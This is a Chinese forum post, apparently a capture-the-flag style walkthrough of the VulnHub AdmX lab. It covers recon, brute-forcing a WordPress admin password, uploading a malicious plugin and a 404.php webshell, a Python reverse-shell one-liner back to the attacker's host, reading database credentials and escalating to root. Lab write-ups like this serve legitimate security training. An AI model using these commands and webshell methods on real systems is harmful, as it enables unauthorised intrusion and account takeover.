shanque打靶日记-day4

F0re4t   ·   发表于 2022-06-01 02:59:39   ·   技术文章

day4

咕咕咕,鸽了一天今天继续来打靶啦。
靶机:https://download.vulnhub.com/admx/AdmX_new.7z
攻击机:kali2022.2
目标:两个flag,root权限

信息收集

1.主机发现
这次使用nmap来进行主机发现
nmap -sn 10.0.3.1/24


不得不说用过的工具里面还是arp-scan和nmap最好用
发现ip地址:10.0.3.9

2.端口扫描/服务探测
全端口扫描
nmap -p- 10.0.3.9
仅开放了80端口
服务探测
nmap -p80 -sV 10.0.3.9
http ubantu Apache

3.web信息收集


根目录为Apache初始化页面
路径扫描
dirsearch -u http://10.0.3.9:80


看到了这个工具还可以指定字典,试一试
dirsearch -u http://10.0.3.9:80 -w /usr/share/dirb/wordlists/common.txt


报错了,不管他

得到信息:
网站很可能是个wordpress站点
尝试访问/wordpress


等了比较久,一直没重定向成功。
burp抓包看看


还没加载完,burp看看它在加载些什么东西


当访问的时候页面的返回包里显示硬编码写入了20次192.168.159.145,然后强制我去访问这个地址下的一些目录,调用一些js脚本。
因为当前kali机是访问不到这个网段的,所以访问页面加载的特别慢,并且很多页面资源加载不出来。
解决办法
先把这里清空

然后把返回包的响应头和响应body里所有强制我们访问的地址192.168.159.145都给他改成1靶机地址10.0.3.9。


再次访问


嗨嗨嗨


注释不了”,然后多加了一个闭合不了他也不报错,有没有小伙伴知道这是为啥的?


一番简单尝试无果后,前面目录扫描扫出来了一个login.php的疑似后台目录,去看看。

至此信息收集结束

web渗透

简单的弱口令,sql注入绕过手段尝试无法直接登陆,但是根据报错的不同我试出来了用户名为admin。
爆破吧,这里没有验证码,试试有没有设定多次失败锁定或者看看阀值在哪里。


漫长的10分钟之后通过返回包内容确认爆破出来了密码为adam14


看看利用点

文件上传


失败咯

404.php写一句话


失败咯

自己写shanque.php,当作插件上传,注意查看其他插件里wp的插件代码格式。


写好后根据wp的规则还要压缩


安装成功后激活


插件默认路径:
/wordpress/wp-content/plugins/shanque.php


又是个垃圾权限。。。。


换一个方法来反弹shell,还记得day1里的python反弹吗小伙伴们

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.3.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

来试试美少妇能不能也getshell,毕竟以及拿到了后台


使用第二个wp_admin_shell_upload

use 2
show options

至此web渗透结束

后渗透

信息收集


美少妇好像出了点问题


手动挡还是靠谱哈
刚刚在web渗透的第二步时,我想通过主题的404.php写入蚁剑的一句话失败了,现在再来试试。




为什么连个编辑的权限都没有啊


还是得升级成一个交互的shell

升级到交互shell

1.把当前获得的shell丢到后台
ctrl z


2.


还必须是bash才行,现在kali是zsh,切换成bash还要重启。。。

今天就先到这吧,有点麻,允许我在鸽一天,咕咕咕

继续更新
切换为bash


重启


重新python反弹shell

export SHELL=/bin/bash
export TERM=screen
export rows 38 columns 116
reset

再次编辑404.php发现已经可以i键进入编辑了


加入蚁剑默认的一句话


第二个shell获取成功。

提权


发现一个wordpress管理员的账号


发现下面有local.txt文件但是我们没有权限看
查看内核版本


内核漏洞提权尝试失败


sudo -l提权失败

在当前目录下发现wp-config.php文件


查看的得到数据库的账号密码信息
密码为wp_admin#123,试试能不能登陆到wp_admin


尝试登陆数据库


也不行
用刚burp跑出来的后台密码adam14试一试


拿到第一个flag
153495edec1b606c24947b1335998bd9

udp提权


7efd721c8bfff2937c66235f2d0dbac1

总结

主机发现(day1-4用到的有,arp-scan,arping,netdiscover,nmap)
端口探测、服务发现
目录扫描,暴力破解(如果访问一个页面加载特别慢,可以用burp抓包看看通信全过程,是不是强制让我们去访问别的地址去加载资源,如果是,可以在match and repalce那里修改。)
上传插件getshell
再获取一个稳定的shell
信息收集发现wpadmin账号
提权
第一个flag
udp提权
root权限,第二个flag。

用到的字典放附件了,感觉还不错

用户名金币积分时间理由
Track-劲夫 50.00 0 2022-06-06 19:07:10 一个受益终生的帖子~~

打赏我,让我更有动力~

附件列表

SuperWordlist-master.zip   文件大小:0.994M (下载次数:1)

0 条回复   |  直到 2022-6-1 | 796 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.